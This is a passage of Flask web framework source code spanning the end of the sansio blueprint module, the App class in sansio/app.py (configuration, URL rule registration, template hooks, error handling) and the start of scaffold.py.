options, first_bp_registration) if self.has_static_folder: state.add_url_rule( f"{self.static_url_path}/<path:filename>", view_func=self.send_static_file, # type: ignore[attr-defined] endpoint="static", ) # Merge blueprint data into parent. if first_bp_registration or first_name_registration: self._merge_blueprint_funcs(app, name) for deferred in self.deferred_functions: deferred(state) cli_resolved_group = options.get("cli_group", self.cli_group) if self.cli.commands: if cli_resolved_group is None: app.cli.commands.update(self.cli.commands) elif cli_resolved_group is _sentinel: self.cli.name = name app.cli.add_command(self.cli) else: self.cli.name = cli_resolved_group app.cli.add_command(self.cli) for blueprint, bp_options in self._blueprints: bp_options = bp_options.copy() bp_url_prefix = bp_options.get("url_prefix") bp_subdomain = bp_options.get("subdomain") if bp_subdomain is None: bp_subdomain = blueprint.subdomain if state.subdomain is not None and bp_subdomain is not None: bp_options["subdomain"] = bp_subdomain + "." + state.subdomain elif bp_subdomain is not None: bp_options["subdomain"] = bp_subdomain elif state.subdomain is not None: bp_options["subdomain"] = state.subdomain if bp_url_prefix is None: bp_url_prefix = blueprint.url_prefix if state.url_prefix is not None and bp_url_prefix is not None: bp_options["url_prefix"] = ( state.url_prefix.rstrip("/") + "/" + bp_url_prefix.lstrip("/") ) elif bp_url_prefix is not None: bp_options["url_prefix"] = bp_url_prefix elif state.url_prefix is not None: bp_options["url_prefix"] = state.url_prefix bp_options["name_prefix"] = name blueprint.register(app, bp_options) def _merge_blueprint_funcs(self, app: App, name: str) -> None: def extend( bp_dict: dict[ft.AppOrBlueprintKey, list[t.Any]], parent_dict: dict[ft.AppOrBlueprintKey, list[t.Any]], ) -> None: for key, values in bp_dict.items(): key = name if key is None else f"{name}.{key}" parent_dict[key].extend(values) for key, value in self.error_handler_spec.items(): key = name if key is None else f"{name}.{key}" value = defaultdict( dict, { code: {exc_class: func for exc_class, func in code_values.items()} for code, code_values in value.items() }, ) app.error_handler_spec[key] = value for endpoint, func in self.view_functions.items(): app.view_functions[endpoint] = func extend(self.before_request_funcs, app.before_request_funcs) extend(self.after_request_funcs, app.after_request_funcs) extend( self.teardown_request_funcs, app.teardown_request_funcs, ) extend(self.url_default_functions, app.url_default_functions) extend(self.url_value_preprocessors, app.url_value_preprocessors) extend(self.template_context_processors, app.template_context_processors) @setupmethod def add_url_rule( self, rule: str, endpoint: str | None = None, view_func: ft.RouteCallable | None = None, provide_automatic_options: bool | None = None, **options: t.Any, ) -> None: """Register a URL rule with the blueprint. See :meth:`.Flask.add_url_rule` for full documentation. The URL rule is prefixed with the blueprint's URL prefix. The endpoint name, used with :func:`url_for`, is prefixed with the blueprint's name. """ if endpoint and "." in endpoint: raise ValueError("'endpoint' may not contain a dot '.' character.") if view_func and hasattr(view_func, "__name__") and "." in view_func.__name__: raise ValueError("'view_func' name may not contain a dot '.' character.") self.record( lambda s: s.add_url_rule( rule, endpoint, view_func, provide_automatic_options=provide_automatic_options, **options, ) ) @setupmethod def app_template_filter( self, name: str | None = None ) -> t.Callable[[T_template_filter], T_template_filter]: """Register a template filter, available in any template rendered by the application. Equivalent to :meth:`.Flask.template_filter`. :param name: the optional name of the filter, otherwise the function name will be used. """ def decorator(f: T_template_filter) -> T_template_filter: self.add_app_template_filter(f, name=name) return f return decorator @setupmethod def add_app_template_filter( self, f: ft.TemplateFilterCallable, name: str | None = None ) -> None: """Register a template filter, available in any template rendered by the application. Works like the :meth:`app_template_filter` decorator. Equivalent to :meth:`.Flask.add_template_filter`. :param name: the optional name of the filter, otherwise the function name will be used. """ def register_template(state: BlueprintSetupState) -> None: state.app.jinja_env.filters[name or f.__name__] = f self.record_once(register_template) @setupmethod def app_template_test( self, name: str | None = None ) -> t.Callable[[T_template_test], T_template_test]: """Register a template test, available in any template rendered by the application. Equivalent to :meth:`.Flask.template_test`. .. versionadded:: 0.10 :param name: the optional name of the test, otherwise the function name will be used. """ def decorator(f: T_template_test) -> T_template_test: self.add_app_template_test(f, name=name) return f return decorator @setupmethod def add_app_template_test( self, f: ft.TemplateTestCallable, name: str | None = None ) -> None: """Register a template test, available in any template rendered by the application. Works like the :meth:`app_template_test` decorator. Equivalent to :meth:`.Flask.add_template_test`. .. versionadded:: 0.10 :param name: the optional name of the test, otherwise the function name will be used. """ def register_template(state: BlueprintSetupState) -> None: state.app.jinja_env.tests[name or f.__name__] = f self.record_once(register_template) @setupmethod def app_template_global( self, name: str | None = None ) -> t.Callable[[T_template_global], T_template_global]: """Register a template global, available in any template rendered by the application. Equivalent to :meth:`.Flask.template_global`. .. versionadded:: 0.10 :param name: the optional name of the global, otherwise the function name will be used. """ def decorator(f: T_template_global) -> T_template_global: self.add_app_template_global(f, name=name) return f return decorator @setupmethod def add_app_template_global( self, f: ft.TemplateGlobalCallable, name: str | None = None ) -> None: """Register a template global, available in any template rendered by the application. Works like the :meth:`app_template_global` decorator. Equivalent to :meth:`.Flask.add_template_global`. .. versionadded:: 0.10 :param name: the optional name of the global, otherwise the function name will be used. """ def register_template(state: BlueprintSetupState) -> None: state.app.jinja_env.globals[name or f.__name__] = f self.record_once(register_template) @setupmethod def before_app_request(self, f: T_before_request) -> T_before_request: """Like :meth:`before_request`, but before every request, not only those handled by the blueprint. Equivalent to :meth:`.Flask.before_request`. """ self.record_once( lambda s: s.app.before_request_funcs.setdefault(None, []).append(f) ) return f @setupmethod def after_app_request(self, f: T_after_request) -> T_after_request: """Like :meth:`after_request`, but after every request, not only those handled by the blueprint. Equivalent to :meth:`.Flask.after_request`. """ self.record_once( lambda s: s.app.after_request_funcs.setdefault(None, []).append(f) ) return f @setupmethod def teardown_app_request(self, f: T_teardown) -> T_teardown: """Like :meth:`teardown_request`, but after every request, not only those handled by the blueprint. Equivalent to :meth:`.Flask.teardown_request`. """ self.record_once( lambda s: s.app.teardown_request_funcs.setdefault(None, []).append(f) ) return f @setupmethod def app_context_processor( self, f: T_template_context_processor ) -> T_template_context_processor: """Like :meth:`context_processor`, but for templates rendered by every view, not only by the blueprint. Equivalent to :meth:`.Flask.context_processor`. """ self.record_once( lambda s: s.app.template_context_processors.setdefault(None, []).append(f) ) return f @setupmethod def app_errorhandler( self, code: type[Exception] | int ) -> t.Callable[[T_error_handler], T_error_handler]: """Like :meth:`errorhandler`, but for every request, not only those handled by the blueprint. Equivalent to :meth:`.Flask.errorhandler`. """ def decorator(f: T_error_handler) -> T_error_handler: def from_blueprint(state: BlueprintSetupState) -> None: state.app.errorhandler(code)(f) self.record_once(from_blueprint) return f return decorator @setupmethod def app_url_value_preprocessor( self, f: T_url_value_preprocessor ) -> T_url_value_preprocessor: """Like :meth:`url_value_preprocessor`, but for every request, not only those handled by the blueprint. Equivalent to :meth:`.Flask.url_value_preprocessor`. """ self.record_once( lambda s: s.app.url_value_preprocessors.setdefault(None, []).append(f) ) return f @setupmethod def app_url_defaults(self, f: T_url_defaults) -> T_url_defaults: """Like :meth:`url_defaults`, but for every request, not only those handled by the blueprint. Equivalent to :meth:`.Flask.url_defaults`. """ self.record_once( lambda s: s.app.url_default_functions.setdefault(None, []).append(f) ) return f File: src/flask/sansio/app.py from __future__ import annotations import logging import os import sys import typing as t from datetime import timedelta from itertools import chain from werkzeug.exceptions import Aborter from werkzeug.exceptions import BadRequest from werkzeug.exceptions import BadRequestKeyError from werkzeug.routing import BuildError from werkzeug.routing import Map from werkzeug.routing import Rule from werkzeug.sansio.response import Response from werkzeug.utils import cached_property from werkzeug.utils import redirect as _wz_redirect from .. import typing as ft from ..config import Config from ..config import ConfigAttribute from ..ctx import _AppCtxGlobals from ..helpers import _split_blueprint_path from ..helpers import get_debug_flag from ..json.provider import DefaultJSONProvider from ..json.provider import JSONProvider from ..logging import create_logger from ..templating import DispatchingJinjaLoader from ..templating import Environment from .scaffold import _endpoint_from_view_func from .scaffold import find_package from .scaffold import Scaffold from .scaffold import setupmethod if t.TYPE_CHECKING: # pragma: no cover from werkzeug.wrappers import Response as BaseResponse from ..testing import FlaskClient from ..testing import FlaskCliRunner from .blueprints import Blueprint T_shell_context_processor = t.TypeVar( "T_shell_context_processor", bound=ft.ShellContextProcessorCallable ) T_teardown = t.TypeVar("T_teardown", bound=ft.TeardownCallable) T_template_filter = t.TypeVar("T_template_filter", bound=ft.TemplateFilterCallable) T_template_global = t.TypeVar("T_template_global", bound=ft.TemplateGlobalCallable) T_template_test = t.TypeVar("T_template_test", bound=ft.TemplateTestCallable) def _make_timedelta(value: timedelta | int | None) -> timedelta | None: if value is None or isinstance(value, timedelta): return value return timedelta(seconds=value) class App(Scaffold): """The flask object implements a WSGI application and acts as the central object. It is passed the name of the module or package of the application. Once it is created it will act as a central registry for the view functions, the URL rules, template configuration and much more. The name of the package is used to resolve resources from inside the package or the folder the module is contained in depending on if the package parameter resolves to an actual python package (a folder with an :file:`__init__.py` file inside) or a standard module (just a ``.py`` file). For more information about resource loading, see :func:`open_resource`. Usually you create a :class:`Flask` instance in your main module or in the :file:`__init__.py` file of your package like this:: from flask import Flask app = Flask(__name__) .. admonition:: About the First Parameter The idea of the first parameter is to give Flask an idea of what belongs to your application. This name is used to find resources on the filesystem, can be used by extensions to improve debugging information and a lot more. So it's important what you provide there. If you are using a single module, `__name__` is always the correct value. If you however are using a package, it's usually recommended to hardcode the name of your package there. For example if your application is defined in :file:`yourapplication/app.py` you should create it with one of the two versions below:: app = Flask('yourapplication') app = Flask(__name__.split('.')[0]) Why is that? The application will work even with `__name__`, thanks to how resources are looked up. However it will make debugging more painful. Certain extensions can make assumptions based on the import name of your application. For example the Flask-SQLAlchemy extension will look for the code in your application that triggered an SQL query in debug mode. If the import name is not properly set up, that debugging information is lost. (For example it would only pick up SQL queries in `yourapplication.app` and not `yourapplication.views.frontend`) .. versionadded:: 0.7 The `static_url_path`, `static_folder`, and `template_folder` parameters were added. .. versionadded:: 0.8 The `instance_path` and `instance_relative_config` parameters were added. .. versionadded:: 0.11 The `root_path` parameter was added. .. versionadded:: 1.0 The ``host_matching`` and ``static_host`` parameters were added. .. versionadded:: 1.0 The ``subdomain_matching`` parameter was added. Subdomain matching needs to be enabled manually now. Setting :data:`SERVER_NAME` does not implicitly enable it. :param import_name: the name of the application package :param static_url_path: can be used to specify a different path for the static files on the web. Defaults to the name of the `static_folder` folder. :param static_folder: The folder with static files that is served at ``static_url_path``. Relative to the application ``root_path`` or an absolute path. Defaults to ``'static'``. :param static_host: the host to use when adding the static route. Defaults to None. Required when using ``host_matching=True`` with a ``static_folder`` configured. :param host_matching: set ``url_map.host_matching`` attribute. Defaults to False. :param subdomain_matching: consider the subdomain relative to :data:`SERVER_NAME` when matching routes. Defaults to False. :param template_folder: the folder that contains the templates that should be used by the application. Defaults to ``'templates'`` folder in the root path of the application. :param instance_path: An alternative instance path for the application. By default the folder ``'instance'`` next to the package or module is assumed to be the instance path. :param instance_relative_config: if set to ``True`` relative filenames for loading the config are assumed to be relative to the instance path instead of the application root. :param root_path: The path to the root of the application files. This should only be set manually when it can't be detected automatically, such as for namespace packages. """ #: The class of the object assigned to :attr:`aborter`, created by #: :meth:`create_aborter`. That object is called by #: :func:`flask.abort` to raise HTTP errors, and can be #: called directly as well. #: #: Defaults to :class:`werkzeug.exceptions.Aborter`. #: #: .. versionadded:: 2.2 aborter_class = Aborter #: The class that is used for the Jinja environment. #: #: .. versionadded:: 0.11 jinja_environment = Environment #: The class that is used for the :data:`~flask.g` instance. #: #: Example use cases for a custom class: #: #: 1. Store arbitrary attributes on flask.g. #: 2. Add a property for lazy per-request database connectors. #: 3. Return None instead of AttributeError on unexpected attributes. #: 4. Raise exception if an unexpected attr is set, a "controlled" flask.g. #: #: In Flask 0.9 this property was called `request_globals_class` but it #: was changed in 0.10 to :attr:`app_ctx_globals_class` because the #: flask.g object is now application context scoped. #: #: .. versionadded:: 0.10 app_ctx_globals_class = _AppCtxGlobals #: The class that is used for the ``config`` attribute of this app. #: Defaults to :class:`~flask.Config`. #: #: Example use cases for a custom class: #: #: 1. Default values for certain config options. #: 2. Access to config values through attributes in addition to keys. #: #: .. versionadded:: 0.11 config_class = Config #: The testing flag. Set this to ``True`` to enable the test mode of #: Flask extensions (and in the future probably also Flask itself). #: For example this might activate test helpers that have an #: additional runtime cost which should not be enabled by default. #: #: If this is enabled and PROPAGATE_EXCEPTIONS is not changed from the #: default it's implicitly enabled. #: #: This attribute can also be configured from the config with the #: ``TESTING`` configuration key. Defaults to ``False``. testing = ConfigAttribute[bool]("TESTING") #: If a secret key is set, cryptographic components can use this to #: sign cookies and other things. Set this to a complex random value #: when you want to use the secure cookie for instance. #: #: This attribute can also be configured from the config with the #: :data:`SECRET_KEY` configuration key. Defaults to ``None``. secret_key = ConfigAttribute[t.Union[str, bytes, None]]("SECRET_KEY") #: A :class:`~datetime.timedelta` which is used to set the expiration #: date of a permanent session. The default is 31 days which makes a #: permanent session survive for roughly one month. #: #: This attribute can also be configured from the config with the #: ``PERMANENT_SESSION_LIFETIME`` configuration key. Defaults to #: ``timedelta(days=31)`` permanent_session_lifetime = ConfigAttribute[timedelta]( "PERMANENT_SESSION_LIFETIME", get_converter=_make_timedelta, # type: ignore[arg-type] ) json_provider_class: type[JSONProvider] = DefaultJSONProvider """A subclass of :class:`~flask.json.provider.JSONProvider`. An instance is created and assigned to :attr:`app.json` when creating the app. The default, :class:`~flask.json.provider.DefaultJSONProvider`, uses Python's built-in :mod:`json` library. A different provider can use a different JSON library. .. versionadded:: 2.2 """ #: Options that are passed to the Jinja environment in #: :meth:`create_jinja_environment`. Changing these options after #: the environment is created (accessing :attr:`jinja_env`) will #: have no effect. #: #: .. versionchanged:: 1.1.0 #: This is a ``dict`` instead of an ``ImmutableDict`` to allow #: easier configuration. #: jinja_options: dict[str, t.Any] = {} #: The rule object to use for URL rules created. This is used by #: :meth:`add_url_rule`. Defaults to :class:`werkzeug.routing.Rule`. #: #: .. versionadded:: 0.7 url_rule_class = Rule #: The map object to use for storing the URL rules and routing #: configuration parameters. Defaults to :class:`werkzeug.routing.Map`. #: #: .. versionadded:: 1.1.0 url_map_class = Map #: The :meth:`test_client` method creates an instance of this test #: client class. Defaults to :class:`~flask.testing.FlaskClient`. #: #: .. versionadded:: 0.7 test_client_class: type[FlaskClient] | None = None #: The :class:`~click.testing.CliRunner` subclass, by default #: :class:`~flask.testing.FlaskCliRunner` that is used by #: :meth:`test_cli_runner`. Its ``__init__`` method should take a #: Flask app object as the first argument. #: #: .. versionadded:: 1.0 test_cli_runner_class: type[FlaskCliRunner] | None = None default_config: dict[str, t.Any] response_class: type[Response] def __init__( self, import_name: str, static_url_path: str | None = None, static_folder: str | os.PathLike[str] | None = "static", static_host: str | None = None, host_matching: bool = False, subdomain_matching: bool = False, template_folder: str | os.PathLike[str] | None = "templates", instance_path: str | None = None, instance_relative_config: bool = False, root_path: str | None = None, ) -> None: super().__init__( import_name=import_name, static_folder=static_folder, static_url_path=static_url_path, template_folder=template_folder, root_path=root_path, ) if instance_path is None: instance_path = self.auto_find_instance_path() elif not os.path.isabs(instance_path): raise ValueError( "If an instance path is provided it must be absolute." " A relative path was given instead." ) #: Holds the path to the instance folder. #: #: .. versionadded:: 0.8 self.instance_path = instance_path #: The configuration dictionary as :class:`Config`. This behaves #: exactly like a regular dictionary but supports additional methods #: to load a config from files. self.config = self.make_config(instance_relative_config) #: An instance of :attr:`aborter_class` created by #: :meth:`make_aborter`. This is called by :func:`flask.abort` #: to raise HTTP errors, and can be called directly as well. #: #: .. versionadded:: 2.2 #: Moved from ``flask.abort``, which calls this object. self.aborter = self.make_aborter() self.json: JSONProvider = self.json_provider_class(self) """Provides access to JSON methods. Functions in ``flask.json`` will call methods on this provider when the application context is active. Used for handling JSON requests and responses. An instance of :attr:`json_provider_class`. Can be customized by changing that attribute on a subclass, or by assigning to this attribute afterwards. The default, :class:`~flask.json.provider.DefaultJSONProvider`, uses Python's built-in :mod:`json` library. A different provider can use a different JSON library. .. versionadded:: 2.2 """ #: A list of functions that are called by #: :meth:`handle_url_build_error` when :meth:`.url_for` raises a #: :exc:`~werkzeug.routing.BuildError`. Each function is called #: with ``error``, ``endpoint`` and ``values``. If a function #: returns ``None`` or raises a ``BuildError``, it is skipped. #: Otherwise, its return value is returned by ``url_for``. #: #: .. versionadded:: 0.9 self.url_build_error_handlers: list[ t.Callable[[Exception, str, dict[str, t.Any]], str] ] = [] #: A list of functions that are called when the application context #: is destroyed. Since the application context is also torn down #: if the request ends this is the place to store code that disconnects #: from databases. #: #: .. versionadded:: 0.9 self.teardown_appcontext_funcs: list[ft.TeardownCallable] = [] #: A list of shell context processor functions that should be run #: when a shell context is created. #: #: .. versionadded:: 0.11 self.shell_context_processors: list[ft.ShellContextProcessorCallable] = [] #: Maps registered blueprint names to blueprint objects. The #: dict retains the order the blueprints were registered in. #: Blueprints can be registered multiple times, this dict does #: not track how often they were attached. #: #: .. versionadded:: 0.7 self.blueprints: dict[str, Blueprint] = {} #: a place where extensions can store application specific state. For #: example this is where an extension could store database engines and #: similar things. #: #: The key must match the name of the extension module. For example in #: case of a "Flask-Foo" extension in `flask_foo`, the key would be #: ``'foo'``. #: #: .. versionadded:: 0.7 self.extensions: dict[str, t.Any] = {} #: The :class:`~werkzeug.routing.Map` for this instance. You can use #: this to change the routing converters after the class was created #: but before any routes are connected. Example:: #: #: from werkzeug.routing import BaseConverter #: #: class ListConverter(BaseConverter): #: def to_python(self, value): #: return value.split(',') #: def to_url(self, values): #: return ','.join(super(ListConverter, self).to_url(value) #: for value in values) #: #: app = Flask(__name__) #: app.url_map.converters['list'] = ListConverter self.url_map = self.url_map_class(host_matching=host_matching) self.subdomain_matching = subdomain_matching # tracks internally if the application already handled at least one # request. self._got_first_request = False def _check_setup_finished(self, f_name: str) -> None: if self._got_first_request: raise AssertionError( f"The setup method '{f_name}' can no longer be called" " on the application. It has already handled its first" " request, any changes will not be applied" " consistently.\n" "Make sure all imports, decorators, functions, etc." " needed to set up the application are done before" " running it." ) @cached_property def name(self) -> str: # type: ignore """The name of the application. This is usually the import name with the difference that it's guessed from the run file if the import name is main. This name is used as a display name when Flask needs the name of the application. It can be set and overridden to change the value. .. versionadded:: 0.8 """ if self.import_name == "__main__": fn: str | None = getattr(sys.modules["__main__"], "__file__", None) if fn is None: return "__main__" return os.path.splitext(os.path.basename(fn))[0] return self.import_name @cached_property def logger(self) -> logging.Logger: """A standard Python :class:`~logging.Logger` for the app, with the same name as :attr:`name`. In debug mode, the logger's :attr:`~logging.Logger.level` will be set to :data:`~logging.DEBUG`. If there are no handlers configured, a default handler will be added. See :doc:`/logging` for more information. .. versionchanged:: 1.1.0 The logger takes the same name as :attr:`name` rather than hard-coding ``"flask.app"``. .. versionchanged:: 1.0.0 Behavior was simplified. The logger is always named ``"flask.app"``. The level is only set during configuration, it doesn't check ``app.debug`` each time. Only one format is used, not different ones depending on ``app.debug``. No handlers are removed, and a handler is only added if no handlers are already configured. .. versionadded:: 0.3 """ return create_logger(self) @cached_property def jinja_env(self) -> Environment: """The Jinja environment used to load templates. The environment is created the first time this property is accessed. Changing :attr:`jinja_options` after that will have no effect. """ return self.create_jinja_environment() def create_jinja_environment(self) -> Environment: raise NotImplementedError() def make_config(self, instance_relative: bool = False) -> Config: """Used to create the config attribute by the Flask constructor. The `instance_relative` parameter is passed in from the constructor of Flask (there named `instance_relative_config`) and indicates if the config should be relative to the instance path or the root path of the application. .. versionadded:: 0.8 """ root_path = self.root_path if instance_relative: root_path = self.instance_path defaults = dict(self.default_config) defaults["DEBUG"] = get_debug_flag() return self.config_class(root_path, defaults) def make_aborter(self) -> Aborter: """Create the object to assign to :attr:`aborter`. That object is called by :func:`flask.abort` to raise HTTP errors, and can be called directly as well. By default, this creates an instance of :attr:`aborter_class`, which defaults to :class:`werkzeug.exceptions.Aborter`. .. versionadded:: 2.2 """ return self.aborter_class() def auto_find_instance_path(self) -> str: """Tries to locate the instance path if it was not provided to the constructor of the application class. It will basically calculate the path to a folder named ``instance`` next to your main file or the package. .. versionadded:: 0.8 """ prefix, package_path = find_package(self.import_name) if prefix is None: return os.path.join(package_path, "instance") return os.path.join(prefix, "var", f"{self.name}-instance") def create_global_jinja_loader(self) -> DispatchingJinjaLoader: """Creates the loader for the Jinja2 environment. Can be used to override just the loader and keeping the rest unchanged. It's discouraged to override this function. Instead one should override the :meth:`jinja_loader` function instead. The global loader dispatches between the loaders of the application and the individual blueprints. .. versionadded:: 0.7 """ return DispatchingJinjaLoader(self) def select_jinja_autoescape(self, filename: str) -> bool: """Returns ``True`` if autoescaping should be active for the given template name. If no template name is given, returns `True`. .. versionchanged:: 2.2 Autoescaping is now enabled by default for ``.svg`` files. .. versionadded:: 0.5 """ if filename is None: return True return filename.endswith((".html", ".htm", ".xml", ".xhtml", ".svg")) @property def debug(self) -> bool: """Whether debug mode is enabled. When using ``flask run`` to start the development server, an interactive debugger will be shown for unhandled exceptions, and the server will be reloaded when code changes. This maps to the :data:`DEBUG` config key. It may not behave as expected if set late. **Do not enable debug mode when deploying in production.** Default: ``False`` """ return self.config["DEBUG"] # type: ignore[no-any-return] @debug.setter def debug(self, value: bool) -> None: self.config["DEBUG"] = value if self.config["TEMPLATES_AUTO_RELOAD"] is None: self.jinja_env.auto_reload = value @setupmethod def register_blueprint(self, blueprint: Blueprint, **options: t.Any) -> None: """Register a :class:`~flask.Blueprint` on the application. Keyword arguments passed to this method will override the defaults set on the blueprint. Calls the blueprint's :meth:`~flask.Blueprint.register` method after recording the blueprint in the application's :attr:`blueprints`. :param blueprint: The blueprint to register. :param url_prefix: Blueprint routes will be prefixed with this. :param subdomain: Blueprint routes will match on this subdomain. :param url_defaults: Blueprint routes will use these default values for view arguments. :param options: Additional keyword arguments are passed to :class:`~flask.blueprints.BlueprintSetupState`. They can be accessed in :meth:`~flask.Blueprint.record` callbacks. .. versionchanged:: 2.0.1 The ``name`` option can be used to change the (pre-dotted) name the blueprint is registered with. This allows the same blueprint to be registered multiple times with unique names for ``url_for``. .. versionadded:: 0.7 """ blueprint.register(self, options) def iter_blueprints(self) -> t.ValuesView[Blueprint]: """Iterates over all blueprints by the order they were registered. .. versionadded:: 0.11 """ return self.blueprints.values() @setupmethod def add_url_rule( self, rule: str, endpoint: str | None = None, view_func: ft.RouteCallable | None = None, provide_automatic_options: bool | None = None, **options: t.Any, ) -> None: if endpoint is None: endpoint = _endpoint_from_view_func(view_func) # type: ignore options["endpoint"] = endpoint methods = options.pop("methods", None) # if the methods are not given and the view_func object knows its # methods we can use that instead. If neither exists, we go with # a tuple of only ``GET`` as default. if methods is None: methods = getattr(view_func, "methods", None) or ("GET",) if isinstance(methods, str): raise TypeError( "Allowed methods must be a list of strings, for" ' example: @app.route(..., methods=["POST"])' ) methods = {item.upper() for item in methods} # Methods that should always be added required_methods = set(getattr(view_func, "required_methods", ())) # starting with Flask 0.8 the view_func object can disable and # force-enable the automatic options handling. if provide_automatic_options is None: provide_automatic_options = getattr( view_func, "provide_automatic_options", None ) if provide_automatic_options is None: if "OPTIONS" not in methods and self.config["PROVIDE_AUTOMATIC_OPTIONS"]: provide_automatic_options = True required_methods.add("OPTIONS") else: provide_automatic_options = False # Add the required methods now. methods |= required_methods rule_obj = self.url_rule_class(rule, methods=methods, **options) rule_obj.provide_automatic_options = provide_automatic_options # type: ignore[attr-defined] self.url_map.add(rule_obj) if view_func is not None: old_func = self.view_functions.get(endpoint) if old_func is not None and old_func != view_func: raise AssertionError( "View function mapping is overwriting an existing" f" endpoint function: {endpoint}" ) self.view_functions[endpoint] = view_func @setupmethod def template_filter( self, name: str | None = None ) -> t.Callable[[T_template_filter], T_template_filter]: """A decorator that is used to register custom template filter. You can specify a name for the filter, otherwise the function name will be used. Example:: @app.template_filter() def reverse(s): return s[::-1] :param name: the optional name of the filter, otherwise the function name will be used. """ def decorator(f: T_template_filter) -> T_template_filter: self.add_template_filter(f, name=name) return f return decorator @setupmethod def add_template_filter( self, f: ft.TemplateFilterCallable, name: str | None = None ) -> None: """Register a custom template filter. Works exactly like the :meth:`template_filter` decorator. :param name: the optional name of the filter, otherwise the function name will be used. """ self.jinja_env.filters[name or f.__name__] = f @setupmethod def template_test( self, name: str | None = None ) -> t.Callable[[T_template_test], T_template_test]: """A decorator that is used to register custom template test. You can specify a name for the test, otherwise the function name will be used. Example:: @app.template_test() def is_prime(n): if n == 2: return True for i in range(2, int(math.ceil(math.sqrt(n))) + 1): if n % i == 0: return False return True .. versionadded:: 0.10 :param name: the optional name of the test, otherwise the function name will be used. """ def decorator(f: T_template_test) -> T_template_test: self.add_template_test(f, name=name) return f return decorator @setupmethod def add_template_test( self, f: ft.TemplateTestCallable, name: str | None = None ) -> None: """Register a custom template test. Works exactly like the :meth:`template_test` decorator. .. versionadded:: 0.10 :param name: the optional name of the test, otherwise the function name will be used. """ self.jinja_env.tests[name or f.__name__] = f @setupmethod def template_global( self, name: str | None = None ) -> t.Callable[[T_template_global], T_template_global]: """A decorator that is used to register a custom template global function. You can specify a name for the global function, otherwise the function name will be used. Example:: @app.template_global() def double(n): return 2 * n .. versionadded:: 0.10 :param name: the optional name of the global function, otherwise the function name will be used. """ def decorator(f: T_template_global) -> T_template_global: self.add_template_global(f, name=name) return f return decorator @setupmethod def add_template_global( self, f: ft.TemplateGlobalCallable, name: str | None = None ) -> None: """Register a custom template global function. Works exactly like the :meth:`template_global` decorator. .. versionadded:: 0.10 :param name: the optional name of the global function, otherwise the function name will be used. """ self.jinja_env.globals[name or f.__name__] = f @setupmethod def teardown_appcontext(self, f: T_teardown) -> T_teardown: """Registers a function to be called when the application context is popped. The application context is typically popped after the request context for each request, at the end of CLI commands, or after a manually pushed context ends. .. code-block:: python with app.app_context(): ... When the ``with`` block exits (or ``ctx.pop()`` is called), the teardown functions are called just before the app context is made inactive. Since a request context typically also manages an application context it would also be called when you pop a request context. When a teardown function was called because of an unhandled exception it will be passed an error object. If an :meth:`errorhandler` is registered, it will handle the exception and the teardown will not receive it. Teardown functions must avoid raising exceptions. If they execute code that might fail they must surround that code with a ``try``/``except`` block and log any errors. The return values of teardown functions are ignored. .. versionadded:: 0.9 """ self.teardown_appcontext_funcs.append(f) return f @setupmethod def shell_context_processor( self, f: T_shell_context_processor ) -> T_shell_context_processor: """Registers a shell context processor function. .. versionadded:: 0.11 """ self.shell_context_processors.append(f) return f def _find_error_handler( self, e: Exception, blueprints: list[str] ) -> ft.ErrorHandlerCallable | None: """Return a registered error handler for an exception in this order: blueprint handler for a specific code, app handler for a specific code, blueprint handler for an exception class, app handler for an exception class, or ``None`` if a suitable handler is not found. """ exc_class, code = self._get_exc_class_and_code(type(e)) names = (*blueprints, None) for c in (code, None) if code is not None else (None,): for name in names: handler_map = self.error_handler_spec[name][c] if not handler_map: continue for cls in exc_class.__mro__: handler = handler_map.get(cls) if handler is not None: return handler return None def trap_http_exception(self, e: Exception) -> bool: """Checks if an HTTP exception should be trapped or not. By default this will return ``False`` for all exceptions except for a bad request key error if ``TRAP_BAD_REQUEST_ERRORS`` is set to ``True``. It also returns ``True`` if ``TRAP_HTTP_EXCEPTIONS`` is set to ``True``. This is called for all HTTP exceptions raised by a view function. If it returns ``True`` for any exception the error handler for this exception is not called and it shows up as regular exception in the traceback. This is helpful for debugging implicitly raised HTTP exceptions. .. versionchanged:: 1.0 Bad request errors are not trapped by default in debug mode. .. versionadded:: 0.8 """ if self.config["TRAP_HTTP_EXCEPTIONS"]: return True trap_bad_request = self.config["TRAP_BAD_REQUEST_ERRORS"] # if unset, trap key errors in debug mode if ( trap_bad_request is None and self.debug and isinstance(e, BadRequestKeyError) ): return True if trap_bad_request: return isinstance(e, BadRequest) return False def should_ignore_error(self, error: BaseException | None) -> bool: """This is called to figure out if an error should be ignored or not as far as the teardown system is concerned. If this function returns ``True`` then the teardown handlers will not be passed the error. .. versionadded:: 0.10 """ return False def redirect(self, location: str, code: int = 302) -> BaseResponse: """Create a redirect response object. This is called by :func:`flask.redirect`, and can be called directly as well. :param location: The URL to redirect to. :param code: The status code for the redirect. .. versionadded:: 2.2 Moved from ``flask.redirect``, which calls this method. """ return _wz_redirect( location, code=code, Response=self.response_class, # type: ignore[arg-type] ) def inject_url_defaults(self, endpoint: str, values: dict[str, t.Any]) -> None: """Injects the URL defaults for the given endpoint directly into the values dictionary passed. This is used internally and automatically called on URL building. .. versionadded:: 0.7 """ names: t.Iterable[str | None] = (None,) # url_for may be called outside a request context, parse the # passed endpoint instead of using request.blueprints. if "." in endpoint: names = chain( names, reversed(_split_blueprint_path(endpoint.rpartition(".")[0])) ) for name in names: if name in self.url_default_functions: for func in self.url_default_functions[name]: func(endpoint, values) def handle_url_build_error( self, error: BuildError, endpoint: str, values: dict[str, t.Any] ) -> str: """Called by :meth:`.url_for` if a :exc:`~werkzeug.routing.BuildError` was raised. If this returns a value, it will be returned by ``url_for``, otherwise the error will be re-raised. Each function in :attr:`url_build_error_handlers` is called with ``error``, ``endpoint`` and ``values``. If a function returns ``None`` or raises a ``BuildError``, it is skipped. Otherwise, its return value is returned by ``url_for``. :param error: The active ``BuildError`` being handled. :param endpoint: The endpoint being built. :param values: The keyword arguments passed to ``url_for``. """ for handler in self.url_build_error_handlers: try: rv = handler(error, endpoint, values) except BuildError as e: # make error available outside except block error = e else: if rv is not None: return rv # Re-raise if called with an active exception, otherwise raise # the passed in exception. if error is sys.exc_info()[1]: raise raise error File: src/flask/sansio/scaffold.py from __future__ import annotations import importlib.util import os import pathlib import sys import typing as t from collections import defaultdict from functools import update_wrapper from jinja2 import BaseLoader from jinja2 import FileSystemLoader from werkzeug.exceptions import default_exceptions from werkzeug.exceptions import HTTPException from werkzeug.utils import cached_property from .. import typing as ft from ..helpers import get_root_path from ..templating import _default_template_ctx_processor if t.TYPE_CHECKING: # pragma: no cover from click import Group # a singleton sentinel value for parameter defaults _sentinel = object() F = t.TypeVar("F", 